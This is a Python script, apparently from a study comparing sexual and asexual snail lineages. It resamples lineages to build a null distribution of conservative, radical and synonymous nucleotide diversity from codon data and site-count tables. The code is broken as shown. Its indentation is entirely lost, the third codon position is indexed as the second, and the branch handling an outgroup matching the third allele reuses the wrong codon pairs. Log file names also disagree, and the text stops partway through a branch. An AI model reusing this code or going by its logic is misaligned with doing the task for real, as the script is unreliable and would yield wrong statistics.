C7Sites = {">$Duluth":3873.77083333, ">$Heron2":3870.66666667, ">$McGregor":3870, ">$Waik36":3879.91666667, ">$WalesC":3880.58333333, ">$clone_1":3871.66666667, ">$AC51":3870.66666667, ">$Heron_mitochondrion":3870.33333333, ">$clone_7":3872.10416667, ">$Waik37":3874.25, ">$Gunn":3872.33333333, ">$DenmarkA":3871.625, ">$Waik372":3875.91666667, ">$Tarawera":3874.58333333, ">$Poerua_triploid":3872.66666667, ">$Kaniere_triploid":3875.91666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3870.29166667, ">$Brunner_2_4n":3832.85416667, ">$Brunner_6_3n":3825.79166667, ">$Grasmere_1_4n":3635.33333333, ">$Grasmere_6_3n":3860.45833333, ">$Poerua_72_4n":3801.89583333, ">$Rotoiti_1_4n":3832.9375, ">$*Kaniere_1_2n":3871.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3873.66666667, ">$*Yellow_Contig_56":3877, ">$*Alexsex":3877, ">$*AlexMap":3877, ">$*Lady":3869, ">$*Ianthe":3872.33333333, ">$*Rotoroa_1_2n":3832.58333333}
R7Sites = {">$Duluth":4748.70833333, ">$Heron2":4745.33333333, ">$McGregor":4745, ">$Waik36":4747.16666667, ">$WalesC":4748.5, ">$clone_1":4744.33333333, ">$AC51":4745, ">$Heron_mitochondrion":4744.66666667, ">$clone_7":4749.04166667, ">$Waik37":4753.16666667, ">$Gunn":4744, ">$DenmarkA":4749.25, ">$Waik372":4748.83333333, ">$Tarawera":4752.83333333, ">$Poerua_triploid":4744.33333333, ">$Kaniere_triploid":4751.5, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4749.91666667, ">$Brunner_2_4n":4787.54166659, ">$Brunner_6_3n":4795.24999994, ">$Grasmere_1_4n":4949.99999963, ">$Grasmere_6_3n":4753.91666665, ">$Poerua_72_4n":4806.62499992, ">$Rotoiti_1_4n":4786.70833328, ">$*Kaniere_1_2n":4744, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4745.33333333, ">$*Yellow_Contig_56":4744.66666667, ">$*Alexsex":4744.66666667, ">$*AlexMap":4744.66666667, ">$*Lady":4746.33333333, ">$*Ianthe":4744.66666667, ">$*Rotoroa_1_2n":4782.83333329}
meanCSites = {">$Duluth":4310.80952381, ">$Heron2":4307.57142857143, ">$McGregor":4307.14285714286, ">$Waik36":4313.14285714286, ">$WalesC":4314.99999999857, ">$clone_1":4307.80952381, ">$AC51":4307.04761904857, ">$Heron_mitochondrion":4307.04761904714, ">$clone_7":4310.19047619, ">$Waik37":4311.76190476143, ">$Gunn":4308.57142857, ">$DenmarkA":4310.04761904714, ">$Waik372":4314.52380952286, ">$Tarawera":4312.28571428429, ">$Poerua_triploid":4308.90476190571, ">$Kaniere_triploid":4312.80952380857, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4308.85714285857, ">$Brunner_2_4n":4273.47619044429, ">$Brunner_6_3n":4277.52380949714, ">$Grasmere_1_4n":4132.47619031857, ">$Grasmere_6_3n":4299.99999999429, ">$Poerua_72_4n":4263.99999996286, ">$Rotoiti_1_4n":4283.76190474143, ">$*Kaniere_1_2n":4308.23809523714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.19047619, ">$*Yellow_Contig_56":4311, ">$*Alexsex":4311, ">$*AlexMap":4311, ">$*Lady":4307.52380952286, ">$*Ianthe":4308.52380952286, ">$*Rotoroa_1_2n":4280.80952379}
meanRSites = {">$Duluth":4311.66964285714, ">$Heron2":4308.42857142857, ">$McGregor":4307.85714285714, ">$Waik36":4313.94047619, ">$WalesC":4314.08333333143, ">$clone_1":4308.19047619, ">$AC51":4308.61904762, ">$Heron_mitochondrion":4307.95238095286, ">$clone_7":4310.95535714286, ">$Waik37":4315.65476190571, ">$Gunn":4307.76190476143, ">$DenmarkA":4310.82738095286, ">$Waik372":4310.22619047714, ">$Tarawera":4315.13095238, ">$Poerua_triploid":4308.09523809429, ">$Kaniere_triploid":4314.60714285714, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4311.35119047714, ">$Brunner_2_4n":4346.91964284714, ">$Brunner_6_3n":4343.51785713429, ">$Grasmere_1_4n":4452.85714280429, ">$Grasmere_6_3n":4314.37499999857, ">$Poerua_72_4n":4344.52083332286, ">$Rotoiti_1_4n":4335.88392856429, ">$*Kaniere_1_2n":4307.42857142714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.80952381, ">$*Yellow_Contig_56":4310.66666666571, ">$*Alexsex":4310.66666666571, ">$*AlexMap":4310.66666666571, ">$*Lady":4307.80952380714, ">$*Ianthe":4308.47619047714, ">$*Rotoroa_1_2n":4334.60714285143}
D1 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#πC/πS
D2 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#πR/πS
D3 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaC/thetaS
D4 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaR/thetaS
D5 = {'piS':[]} #πS
logfile = open('mt_nullDistribution_IantheAnalysis.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
else:
outList.append(seq)
seqNums = range(len(popList))
currPCT = 0
sexN = 6
asexN = 16
sexAn = aN(sexN)
asexAn = aN(asexN)
logfile.write('Calculating population genetic parameters:\n')
logfile.close()
while len(D1['mean']) < 10000:
newPCT = int(round(100*len(D1['mean'])/10000.0))
if newPCT > currPCT:
logfile = open('mt_nullDistribution_πS.log','a')
logfile.write('\t' + str(newPCT) + '% complete\n')
logfile.close()
currPCT = newPCT
sexList = []
asexList = []
while len(sexList) < sexN:
currNum = random.choice(seqNums)
if popList[currNum] not in sexList:
sexList.append(popList[currNum])
while len(asexList) < asexN:
currNum = random.choice(seqNums)
if popList[currNum] not in asexList and popList[currNum] not in sexList:
asexList.append(popList[currNum])
sexSynSites = 0.0
asexSynSites = 0.0
sexC1Sites = 0.0
sexC2Sites = 0.0
sexC3Sites = 0.0
sexC4Sites = 0.0
sexC5Sites = 0.0
sexC6Sites = 0.0
sexC7Sites = 0.0
sexMeanCSites = 0.0
sexR1Sites = 0.0
sexR2Sites = 0.0
sexR3Sites = 0.0
sexR4Sites = 0.0
sexR5Sites = 0.0
sexR6Sites = 0.0
sexR7Sites = 0.0
sexMeanRSites = 0.0
asexC1Sites = 0.0
asexC2Sites = 0.0
asexC3Sites = 0.0
asexC4Sites = 0.0
asexC5Sites = 0.0
asexC6Sites = 0.0
asexC7Sites = 0.0
asexMeanCSites = 0.0
asexR1Sites = 0.0
asexR2Sites = 0.0
asexR3Sites = 0.0
asexR4Sites = 0.0
asexR5Sites = 0.0
asexR6Sites = 0.0
asexR7Sites = 0.0
asexMeanRSites = 0.0
for sexual in sexList:
sexSynSites += synSites[sexual]
sexC1Sites += C1Sites[sexual]
sexC2Sites += C2Sites[sexual]
sexC3Sites += C3Sites[sexual]
sexC4Sites += C4Sites[sexual]
sexC5Sites += C5Sites[sexual]
sexC6Sites += C6Sites[sexual]
sexC7Sites += C7Sites[sexual]
sexMeanCSites += meanCSites[sexual]
sexR1Sites += R1Sites[sexual]
sexR2Sites += R2Sites[sexual]
sexR3Sites += R3Sites[sexual]
sexR4Sites += R4Sites[sexual]
sexR5Sites += R5Sites[sexual]
sexR6Sites += R6Sites[sexual]
sexR7Sites += R7Sites[sexual]
sexMeanRSites += meanRSites[sexual]
for asexual in asexList:
asexSynSites += synSites[asexual]
asexC1Sites += C1Sites[asexual]
asexC2Sites += C2Sites[asexual]
asexC3Sites += C3Sites[asexual]
asexC4Sites += C4Sites[asexual]
asexC5Sites += C5Sites[asexual]
asexC6Sites += C6Sites[asexual]
asexC7Sites += C7Sites[asexual]
asexMeanCSites += meanCSites[asexual]
asexR1Sites += R1Sites[asexual]
asexR2Sites += R2Sites[asexual]
asexR3Sites += R3Sites[asexual]
asexR4Sites += R4Sites[asexual]
asexR5Sites += R5Sites[asexual]
asexR6Sites += R6Sites[asexual]
asexR7Sites += R7Sites[asexual]
asexMeanRSites += meanRSites[asexual]
# Convert the accumulated totals into per-individual mean site counts.
# NOTE(review): raises ZeroDivisionError if asexList or sexList is empty —
# presumably guaranteed non-empty by the caller; confirm upstream.
asexSynSites /= len(asexList)
asexC1Sites /= len(asexList)
asexC2Sites /= len(asexList)
asexC3Sites /= len(asexList)
asexC4Sites /= len(asexList)
asexC5Sites /= len(asexList)
asexC6Sites /= len(asexList)
asexC7Sites /= len(asexList)
asexMeanCSites /= len(asexList)
asexR1Sites /= len(asexList)
asexR2Sites /= len(asexList)
asexR3Sites /= len(asexList)
asexR4Sites /= len(asexList)
asexR5Sites /= len(asexList)
asexR6Sites /= len(asexList)
asexR7Sites /= len(asexList)
asexMeanRSites /= len(asexList)
sexSynSites /= len(sexList)
sexC1Sites /= len(sexList)
sexC2Sites /= len(sexList)
sexC3Sites /= len(sexList)
sexC4Sites /= len(sexList)
sexC5Sites /= len(sexList)
sexC6Sites /= len(sexList)
sexC7Sites /= len(sexList)
sexMeanCSites /= len(sexList)
sexR1Sites /= len(sexList)
sexR2Sites /= len(sexList)
sexR3Sites /= len(sexList)
sexR4Sites /= len(sexList)
sexR5Sites /= len(sexList)
sexR6Sites /= len(sexList)
sexR7Sites /= len(sexList)
sexMeanRSites /= len(sexList)
# First sexual individual serves as the reference sequence; the first
# outgroup individual supplies the sequence and codon list used below to
# polarize segregating codons (identify the ancestral allele).
refSeq = seqDict[sexList[0]]
outSeq = seqDict[outList[0]]
outCodons = codonDict[outList[0]]
# Accumulators for the codon-by-codon scan of the sexual sample.
# sex_sum2PQ_* hold summed expected heterozygosity (2pq) per mutation
# class; sex_*S hold segregating-change counts.  Classes: S = synonymous,
# N = nonsynonymous, C1-C7 / R1-R7 = conservative / radical under the
# seven CRI property partitions, meanC / meanR = classification by the
# mean CRI score (threshold 0.5, applied in the loop below).
sex_sum2PQ_S = 0
sex_sum2PQ_N = 0
sex_sum2PQ_C1 = 0
sex_sum2PQ_C2 = 0
sex_sum2PQ_C3 = 0
sex_sum2PQ_C4 = 0
sex_sum2PQ_C5 = 0
sex_sum2PQ_C6 = 0
sex_sum2PQ_C7 = 0
sex_sum2PQ_R1 = 0
sex_sum2PQ_R2 = 0
sex_sum2PQ_R3 = 0
sex_sum2PQ_R4 = 0
sex_sum2PQ_R5 = 0
sex_sum2PQ_R6 = 0
sex_sum2PQ_R7 = 0
sex_sum2PQ_meanC = 0
sex_sum2PQ_meanR = 0
sex_synS = 0
sex_nsynS = 0
sex_con1S = 0
sex_con2S = 0
sex_con3S = 0
sex_con4S = 0
sex_con5S = 0
sex_con6S = 0
sex_con7S = 0
sex_meanConS = 0
sex_rad1S = 0
sex_rad2S = 0
sex_rad3S = 0
sex_rad4S = 0
sex_rad5S = 0
sex_rad6S = 0
sex_rad7S = 0
sex_meanRadS = 0
# Codon index for the scan loop that follows.
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in sexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
sex_synS += 1
sex_sum2PQ_S += twoPQ
else:
sex_nsynS += 1
sex_sum2PQ_N += twoPQ
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
sex_nsynS += 1
sex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
sex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
else:
sex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ1
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ1
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ1
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ1
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ1
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ1
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ1
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ1
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
sex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
sex_meanConS += 1
sex_sum2PQ_meanC += twoPQ2
else:
sex_meanRadS += 1
sex_sum2PQ_meanR += twoPQ2
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sex_sum2PQ_S += twoPQ1
sex_sum2PQ_N += twoPQ2
sex_synS += 1
sex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
sex_con1S += 1
sex_sum2PQ_C1 += twoPQ2
else:
sex_rad1S += 1
sex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
sex_con2S += 1
sex_sum2PQ_C2 += twoPQ2
else:
sex_rad2S += 1
sex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
sex_con3S += 1
sex_sum2PQ_C3 += twoPQ2
else:
sex_rad3S += 1
sex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
sex_con4S += 1
sex_sum2PQ_C4 += twoPQ2
else:
sex_rad4S += 1
sex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
sex_con5S += 1
sex_sum2PQ_C5 += twoPQ2
else:
sex_rad5S += 1
sex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
sex_con6S += 1
sex_sum2PQ_C6 += twoPQ2
else:
sex_rad6S += 1
sex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
sex_con7S += 1
sex_sum2PQ_C7 += twoPQ2
else:
sex_rad7S += 1
